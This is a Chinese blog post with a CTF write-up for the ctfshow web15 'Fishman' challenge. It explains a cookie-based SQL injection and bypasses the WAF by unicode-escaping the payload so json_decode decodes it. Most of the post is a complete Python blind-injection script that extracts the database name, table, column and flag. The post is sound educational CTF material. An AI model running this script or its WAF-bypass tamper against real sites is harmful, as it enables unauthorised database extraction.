ctfshow-web-web15 Fishman

最新推荐文章于 2024-04-28 13:46:58 发布
最新推荐文章于 2024-04-28 13:46:58 发布
阅读量505 收藏 1
点赞数
分类专栏: web CTF 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HAI_WD/article/details/132810588
版权
CTF 同时被 2 个专栏收录
81 篇文章 0 订阅
订阅专栏
web
37 篇文章 0 订阅
订阅专栏

0x00 前言

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取

0x01 题目

在这里插入图片描述

0x02 Write Up

首先拿到题目,先扫描一下,发现一个www.zip

在这里插入图片描述
发现一个admin目录,访问一下:

在这里插入图片描述
在member.php中发现一段代码,这段代码中存在sql注入,也就是在cookie中的sql注入

在这里插入图片描述
有一个要点是,在代码中存在waf

在这里插入图片描述
这里有一个小知识就是json_decode可以识别unicode代码。那么我们可以将我们的测试poc改为unicode

true的话会返回一组

在这里插入图片描述
false会返回两组
在这里插入图片描述

以此为依据,可以进行遍历

脚本用的是大佬写好的脚本

#encoding=utf-8
import requests

url = "http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/"

def tamper(payload):
    payload = payload.lower()
    payload = payload.replace('u', '\\u0075')
    payload = payload.replace('\'', '\\u0027')
    payload = payload.replace('o', '\\u006f')
    payload = payload.replace('i', '\\u0069')
    payload = payload.replace('"', '\\u0022')
    payload = payload.replace(' ', '\\u0020')
    payload = payload.replace('s', '\\u0073')
    payload = payload.replace('#', '\\u0023')
    payload = payload.replace('>', '\\u003e')
    payload = payload.replace('<', '\\u003c')
    payload = payload.replace('-', '\\u002d')
    payload = payload.replace('=', '\\u003d')
    payload = payload.replace('f1a9', 'F1a9')
    payload = payload.replace('f1', 'F1')
    return payload

#get database length
def databaseName_len():
    print ("start get database name length...")
    for l in range(0,45):
        payload = "1' or (length(database())=" + str(l+1) + ")#"
        print(payload)
        payload = tamper(payload)
        print(payload)
        tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
        print(tmpCookie)
        exit()
        headers = {'cookie': tmpCookie}
        r =requests.get(url, headers=headers)
        myHeaders = str(r.raw.headers)
        if ((myHeaders.count("login_data") == 1)):
            print('get db length = ' + str(l).lower())
            break
            
#get content
def get_databaseName():
    flag = ''
    for j in range(0, 15):
        for c in range(0x20,0x7f):
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (database()) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
            #print(payload)
            payload = tamper(payload)
            tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
            headers = {'cookie': tmpCookie}
            r =requests.get(url, headers=headers)
            myHeaders = str(r.raw.headers)
            if ((myHeaders.count("login_data") == 2)):
                flag += chr(c - 1)
                print('databasename = ' + flag.lower())
                break

#get content
def get_tableName():
    flag = ''
    for j in range(0, 30):           #blind inject
        for c in range(0x20,0x7f):
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select table_name from information_schema.tables where table_schema=database() limit 3,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
            #print(payload)
            payload = tamper(payload)
            tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
            headers = {'cookie': tmpCookie}
            r =requests.get(url, headers=headers)
            myHeaders = str(r.raw.headers)
            if ((myHeaders.count("login_data") == 2)):
                flag += chr(c - 1)
                print('tablename = ' + flag.lower())
                break
                
#get content
def get_ColumnName():
    flag = ''
    for j in range(0, 10):           #blind inject
        for c in range(0x20,0x7f):
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select column_name from information_schema.columns where table_name='FL2333G' limit 0,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
            #print(payload)
            payload = tamper(payload)
            tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
            headers = {'cookie': tmpCookie}
            r =requests.get(url, headers=headers)
            myHeaders = str(r.raw.headers)
            if ((myHeaders.count("login_data") == 2)):
                flag += chr(c - 1)
                print('column name = ' + flag.lower())
                break
                
#get content
def get_value():
    flag = ''
    for j in range(0, 50):           #blind inject
        for c in range(0x20,0x7f):
            if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':
                continue
            else:
                payload = "1' or (select (select FLLLLLAG from FL2333G) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"
            #print(payload)
            payload = tamper(payload)
            tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payload
            headers = {'cookie': tmpCookie}
            r =requests.get(url, headers=headers)
            myHeaders = str(r.raw.headers)
            if ((myHeaders.count("login_data") == 2)):
                flag += chr(c - 1)
                print('flag = ' + flag.lower())
                break

print ("start database sql injection...")
# databaseName_len()
# get_databaseName()
# get_tableName()
# get_ColumnName()
get_value()

0x03 other

欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。

以上

Wcbddd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ITensor:一个用于高效张量网络计算的C ++库
05-04
主页: : 一个高效且灵活的C ++库,用于执行张量网络计算。 库的基础是智能张量或ITensor。 收缩ITensor并不比乘上标量更难:匹配的索引会自动找到彼此并收缩。 这使得将张量网络图转换为正确,有效的代码变得容易。 可以在文件中找到安装说明。 引文 如果您在工作中使用ITensors.jl,请暂时引用: @misc { fishman2020itensor , title = { The \mbox{ITensor} Software Library for Tensor Network Calculations } , author = { Matthew Fishman and Steven R. White and E. Miles Stoudenmire } , year = { 2020 } , eprint = { 2007
项目无法添加到tomcat
We get old too soon and wise too late
12-25 518
项目无法添加到tomcat项目右击—>properties
ctfshow_萌新_萌新隐藏题
ScyLamb的博客
01-03 3230
https://harvey-blog.com/Safety/525 0x01 萌新认证 加群召唤flag 0x02 萌新_密码 萌新不会 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 看见没有大于F的字符,尝试16进制 写Python脚本,每2位16进制转文本 import re number = '53316C6B5A6A42684D3
CTFshow web15
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web15关, 这一关是代码执行漏洞, 需要灵活的运用PHP的命令执行函数, 在上一关的基础上又过滤了 = ? > 关键字, 看起来已经没啥思路了, 但仔细一看, 它居然取消了对分号;的过滤, 这样一来就好办了, 继续上一关的曲线救国思路, 先GET请求传递一句话木马, 再用POST请求传递系统命令, 即可拿到 flag 进入页面后, 可以看到部分源码, 源码中提示 flag 就藏在 config.php 文件中 源码中通过GET请求获取参数, 并...
ctfshow简单题web1-15
qq_62984336的博客
03-10 896
ctfshow萌新 ctfshow萌新web1web2-4web5-7web5web6web7web9web10web11web12web13web14、15 总结:这几题主要都是正则匹配字符过滤的绕过,基本步骤都是源码中查看过滤规则->找到注入点->传入payload。只在web1中写了比较完整的步骤,剩下的题目主要只说对于字符过滤的绕过方法。 web1 1.手动注入。需要绕过函数inval,要求id不能大于999且id=1000,所以用'1000'字符代替数字1000 .
[代码审计][备份泄露][时间盲注]CTFSHOW----WEB15(不会做以后补充)
Y4tacker的博客
08-06 7166
文章目录备份文件代码审计 备份文件 首先题目hint里面说了是源码泄露,我自己随便输入也发现了www.zip,但是还是走流程吧,用dirsearch工具,从这里我们也能发现突破口 代码审计 首先这是它给的压缩包,从里面我看了一下发现关键文件2020.php 发现是基于X-Forwarded-For,也就是XFF头的注入 <?php require_once './include/common.php'; $realip = real_ip(); $ipcount = $DB->count("
CTFSHOW WEB题目
qq_45655564的博客
08-09 2747
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
【Ctfshow_Web】信息收集和爆破
_Co1a
02-17 912
ctfshow
[CTFshow]吃瓜杯复现wp
Huamang的博客
08-19 767
热身 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num,
CTFSHOW系列-web15(信息收集-邮箱信息泄露)
siu~
11-29 404
CTFSHOW系列解题思路
fishman-tweetero-f4e2ece.7z
07-06
fishman-tweetero-f4e2ece.7z
UniDAC.v.6.2.8.D6-XE10.1.Src.Fishman.rar
06-30
UniDAC.v.6.2.8.D6-XE10.1.Src.Fishman.rar
论文研究 - 使用手腕和颈椎评估骨骼成熟
05-30
当使用手和腕部分析中Fishman的11个骨骼成熟阶段的三种经过分类修改的方法与CVMS进行比较时,根据Wilcoxon符号等级检验和Sign检验,方法2和3在统计学意义上均显着不同。小于0.05。 但是,对于方法1,测试显示的概率...
tesseract-ocr_4.0 + vs2015编译
09-18
解压缩后配置环境可以直接使用,本人的环境是visual studio 2015 + tesseract 4.0。关于tesseract 4.0中API的调用,大家可以访问我的博客。
判断前端入参是否空否则提示前端写法
最新发布
qq_39306234的博客
04-28 218
前端先声明一个变量,用于alert判断。在templeat中定义一个提示语句。然后在点击事件时判断一下是否展示。
vue实现录音并转文字功能,包括PC端web,手机端web
byebukesi的博客
04-26 503
不止vue,不限技术栈,vue2、vue3、react、.net以及原生js均可实现。
2024 XYCTF Web 方向 wp 全解
qq_39947980的博客
04-27 965
XYCTF 2024 Web 方向全解
两个前端标签
ma_no_lo的博客
04-24 166
两个前端标签
前端Vue2项目搭建过程
xuemen11的博客
04-25 1203
vue2,vuex,vant组件库
ctfshow的web15 fishman
09-11
根据引用,ctfshow的web15 fishman是一道CTF比赛中的题目。根据引用的源代码,题目要求找到关键的源代码,并扫描目录。代码中包含了一个函数`receiveStreamFile`,用于接收文件流并将其保存到指定的文件中。代码还检查了一个条件,即`md5(date("i")) === $token`,如果满足条件,则将接收的文件进行一系列的判断和比较,最后返回一个JSON格式的结果。根据引用,这道题目可能与之前的SSRF题目相关。至于具体的解题方法和答案,还需要进一步研究和分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值